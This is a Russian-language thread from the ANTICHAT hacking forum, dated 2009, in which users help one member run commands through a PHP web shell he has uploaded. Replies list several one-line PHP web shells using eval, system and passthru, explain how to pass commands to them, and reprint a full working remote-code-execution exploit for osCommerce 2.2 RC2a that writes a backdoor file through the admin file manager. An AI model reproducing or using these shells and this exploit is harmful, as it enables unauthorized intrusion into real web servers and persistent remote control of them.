ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.11.2009, 15:06
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме: 2223440
Репутация:
648
|
|
Сообщение от sideup
Да. Конечно. Но ничего.
Пробовал <?php phpinfo(); ?> работает отлично.
Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок
не выдаёт, но что-то не пойму как команды выполнять
shell.php?cmd=id не катит.
Ошибок не выдаёт, потому что перед eval стоит @.
Чтоб команды выполнять, надо отправлять команды через POST. Для этого можно, к примеру, написать форму, а можно пользоваться программой для подделки http-заголовка. Типа InetCrack или HTTPReq
В общем заливай так: <?php eval(\$_GET['cmd']); ?>
Последний раз редактировалось Root-access; 19.01.2010 в 18:31..
Причина: опечатка
|
|
|

12.11.2009, 15:09
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
Сообщение от sideup
Да. Конечно. Но ничего.
Пробовал <?php phpinfo(); ?> работает отлично.
Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок
не выдаёт, но что-то не пойму как команды выполнять
shell.php?cmd=id не катит.
#10081 
|
|
|

12.11.2009, 15:10
|
|
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме: 20161
Репутация:
0
|
|
Сообщение от L I G A
переметру cmd передавай пых код
Если не трудно можно пример такого запроса для:
pwd;ls -l
|
|
|

12.11.2009, 15:13
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
Сообщение от sideup
Если не трудно можно пример такого запроса для:
pwd;ls -l
в случае с eval() то shell.php?cmd=system(ls -la);
|
|
|

12.11.2009, 15:13
|
|
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме: 20161
Репутация:
0
|
|
Сообщение от Aртем
 печальный вопрос
Код:
<?system($_GET[cmd])?>
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>
и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН
Не работает из этого ничего.
<?php phpinfo(); ?> работает отлично
|
|
|

12.11.2009, 15:14
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
Сообщение от sideup
Не работает из этого ничего.
<?php phpinfo(); ?> работает отлично
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.
|
|
|

12.11.2009, 15:20
|
|
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме: 20161
Репутация:
0
|
|
Сообщение от Aртем
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.
Вот отсюда взял
http://www.milw0rm.com/exploits/9556
|
|
|

12.11.2009, 15:25
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
PHP код:
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='domain.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]
|
|
|

12.11.2009, 15:26
|
|
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме: 20161
Репутация:
0
|
|
Сообщение от Aртем
в случае с eval() то shell.php?cmd=system(ls -la);
Не работает 
|
|
|

12.11.2009, 15:33
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Aртем
я его чуть-чуть подправил...
Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!
=====================
sideup
Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:
shell.php?ev=phpinfo();
=======================
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|